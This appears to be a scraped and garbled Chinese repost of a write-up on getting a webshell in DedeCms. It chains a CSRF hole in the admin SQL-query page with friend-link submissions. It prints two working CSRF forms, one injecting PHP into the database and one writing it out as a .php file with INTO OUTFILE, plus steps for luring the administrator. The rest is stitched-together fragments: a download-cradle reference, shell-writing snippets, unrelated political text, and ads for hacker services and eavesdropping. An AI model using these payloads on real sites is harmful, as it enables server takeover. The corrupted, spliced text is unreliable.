&nIndexedDBbsp; 织梦内容办理系统(DedeCms) 以简略、有用、开源而出名,是国内最闻名的PHP开源网站办理系统,也是运用用户最多的PHP类CMS系统,在阅历多年的开展,现在的版别不管在功用,仍是在易用性方面,都有了长足的开展和前进,DedeCms免费版的首要方针用户锁定在个人站长,功用更专心于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在运用本系统。
最近我在建立这个系统的时分偶然间发现了一个风趣的现象,织梦的后台竟然有一个可以直接实行SQL句子的功用,出于工作活络,能直接实行SQL句子的当地往往会有一些缝隙。又经过一番查找发现了它后台存在一个CSRF的缝隙,一般情况下像这种缝隙都是不怎么能引起人们的重视的,毕竟是要经过交互才干起效果,并且起的效果还不大。认为到此就完毕了吗?并不是。
这儿底子形不成一个有用的进犯链,不过我又发现了一个很有意思的当地,这个cms是可以在前台直接提结交链恳求的,那么问题来了?你提交了友链恳求办理员审阅的时分怎么可能不去阅读一下你的网站。所以有了下面的一套getshell的流程。
受影响的版别<=官方最新版别(V57UTF8SP2)这是一个0day哦!!
试验环境 :win10,wamp
1.首要我们结构一个向数据库中刺进SHELL句子的恶意页面(这儿我屡次铲除cookie,屡次封闭阅读器进行检验发现,该页面的效果不受其他要素影响均可正常实行),这段代码的效果就是像数据库中刺进我们的shell code。
页面的代码如下:
<html> <!-- CSRF PoC - generated by Burp Suite Professional -->
<body> <form action="http://127.0.0.1/dedecms/dede/sys_sql_query.php" method="POST">
<input type="hidden" name="d getchar();opost" value="query" />
<input type="hidden" name="querytype" value="2" />
<input type="hidden" name="sqlquery" value="INSERT INTO dede_flink(id,sortrank,url,webname,msg,email,logo,dtime,typeid,ischeck)VALUES('1','1','www.baidu.com','1','<?php phpinfo();?>','1','1','1','1','1');" />
<input type="hidden" name="imageField.x" value="42" />
<input type="hidden" name="imageField.y" value="17" />
<input type="submit" value="Submit request" />
</form> </body>
</html>
2.此刻我将该页面放置在我自己的服务器上这儿就可以随意放置一个当地,为了愈加形象,你可以在页面上做一些操作,比方加上 *** 代码使得办理员拜访页面的时分不会跳转,这样更神不知鬼不觉工作缓慢的库了。
3.然后我去受害网站上提交一个友链恳求将我自己网站上的恶意页面链接填入。这个链接直接对应你结构好的恶意页面。
4.然后提交,等候办理员审阅办理员审阅友链时定会检查友链所链接的内容。(办理员已然可以看到该链接证明此刻必定处于登陆情况)
5.只要是办理员检查了我们恳求友链的链接那么就触发了恶意代码的实行此刻我们可以看到数据库中被刺进了恶意代码。这儿的代码可以自定义,依据你想做的操作自定义就可以了。这儿我就是做试验,就是用了<?php phpinfo() ?>
6.此刻不管办理员经过或许是不经过,我们的代码现已刺进此刻我们结构生成shell的恶意页面,页面代码如下,结构完结之后相同放在我们自己的服务器上。(这儿结构时,我们需求知道网站的途径,这儿知道相对途径或许时绝对途径都是可以的。途径的获取 *** :一个网站的建立大多数选用 phpstudy wamp 或许原生态的在PHP下的www目录,这儿很好猜想。或许直接恳求一个网站上不存在的资源一般会爆出相对途径,或许去拜访一篇文章分析途径,再或许用AWVS直接拿到途径,横竖这儿获取途径的 *** 特别多)
下面这段代码的效果是把我们刚刚刺进的shell code生成一个php页面。
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body> <
form action="http://127.0.0.1/dedecms/dede/sys_sql_query.php" method="POST">
<input type="hidden" name="dopost&q
uot; value="query" />
<input type="hidden" name="~ ➤ hostnamequerytype" value="2" />
<input type="hidden" name="sqlquery" value="SELECT msg FROM dede_flink WHERE url="www.baidu.com" INTO OUTFILE "../../../../www/dedecms/21111.php"" />
<input type="hidden" name="imageField.x" value="38" />
<input type="hidden" name="imageField.y" value="15" />
<input type="submit" value="Submit request" />
</form>
</body></html>
7.此刻我们如上过程3所示,提交一个该页面的友链恳求当办理员检查该页面时触发代码的实行,在服务器端生成一个我们自定义称号的shell。然后我们去拜访我们的SHELL。可以看到实行成功。
这就是在一次检验环境中找到的一个逻辑缝隙,有时分我们会常常发现一些微乎其微的小缝隙之类的,单个的看起来是没有什么效果可是多个微乎其微的小缝隙结合起来往往会收到超出预期的效果。
*本文原创作者:sjy93812,本文属FreeBuf原创奖赏方案,未经许以下指令用于发起此检验用例的扫描:可制止转载
先就事黑客:我是怎么经过CSRF拿到Shell的
一次性实行任务:at指令———>atd进程a. 调用http://173[.]208.139.170/s.txt中的内容来绕过检测。该指令会调
用另一个下载cradle的指令我是如何通过CSRF拿到Shell的
先办事黑客用WaitForSingleObject设置一个等候情况,当发生了如上行为,就说明发现了勒索病毒,完结代码如下:_In_ const VOID * lpvBits免杀效果及样本特征
程序开发人员一般会把重复运用的函数写到单个文件中,需求运用某个函数时直接调用此文件,而无需再次编写,这中文件调用的进程一般被称为文件包含。程序开发人员一般希望代码更活络,所以将被包含的文件设置为变量,用来进行动态调用,但正是由于这种活络性,然后导致客户端可以调用一个恶意文件,构成文件包含缝隙。几乎全部脚本言语都会供应文件包含的功用,但文件包含缝隙在PHP中居多,而在 *** P、ASP、ASP.NET程序中却非常少,甚至没有,这是有些言语规划的害处。在PHP中常常出现包含缝隙,但这并不意味这其他言语不存在。面对中东区域仅有具有核武器和具有能发射卫星实力的以色列,哈马斯常常被以色列人按在地上冲突。而作为“圣战”代表,主张消除以色列,解放巴全部被占领土的哈马斯,很长一段时间,只能靠自杀式突击进行反击。所需信息$ apt-get install bridge-utils先办事黑客
1. ”变成“一个署理 Size: 576716800
file_put_contents(M_LOG,serialize($file_list));可是……我在读取学校水卡的时分,遇到了“扇区全加密”的问题我是如何通过CSRF拿到Shell的
先办事黑客0x01 初衷以及适用场景 KernelBuffer = ExAllocatePoolWithTag(NonPagedP
ool,Win8+
try{}echo ""> shell.phpDNS的解析进程先办事黑客
系统损坏挟制(Insider System Sabotage)是指内部人运用信息技术(IT) *** 直接对组织或个人构成损害的行为。其他,有一些设备中包含trustlet是为了保证设备的完整性。例如,三星供应了一个“TrustZone-based Integrity Measurement Architecture (TIMA)”结构来保证设备完整性,TIMA会对“一般世界”内核守时检查,验证是否与原厂内核相匹配。可是,简略地获取内核加载地址并不是全部——系统中存在许多的内核镜像和内核符号。因此,我们需求找到全部动态运用工作时内核内存的符号。要知道,Linux内核在内部维护着一个内核符号列表,容许内核函数运用特其他搜索函数kallsyms_lookup_name查找这些符号。for x in targets: 我是如何通过CSRF拿到Shell的
2.NetScantools根底版
增加缺失的“vboxsf”组请参看注解部分,详细如下:在静态分析的终究,我们从中发现了一些代码‘/ngst/com/dcx/NGST/vehicle/services/security/SecurityUnlockManagerImp.java’ ,下面的代码就是来自这个方位:手机微信不断关注会不断提示的,会显示信息在发朋友圈人与别的给他们关注的且与你是共同好友的人的盆友圈中,可是不容易提升浏览量纪录。 手机微信(WeChat)是腾讯企业于二零一一年1月21日发...
黑客找宽带密码相关问题 飞艇真实黑客联系方式相关问题 黑客盗空银行卡怎么办 怎么成为一个手机黑客(黑客手机号定位)...
这个除非是警方的窃听器不然一般的话是听不到的哈这个属于隐私 爱情的基础是相互信任,如果失去了基本的信任,可以说生活中的任何事都可能引起怀疑和争吵,所以当失去信任后,说明这段。 那需要在你老婆手机里面安...
微信群退出后,无法通过系统恢复。微信加群方法:通过群成员主动邀请加入;通过群二维码扫描加入;建群方法:登录微信后点击右上角“+”=》发起群聊=》。 四种方法找回退出的微信群:方法一:查找好友共同群组查...
以苹果11 iOS14.1系统版本为例,微信app版本为7.0.18,把微信设置成黑色的方法如下: 1、首先在手机桌面上找到设置图标并点击它; 2、随后选择“显示与亮度”选项; ...
wps表格中如何迅速形成注释呢,话说许多客户都是在资询这个问题呢?下边就来我这儿看下wps表格中迅速形成注释的实例教程流程吧,必须的盆友能够参照下哦。 wps表格中如何迅速形成注释呢,话说...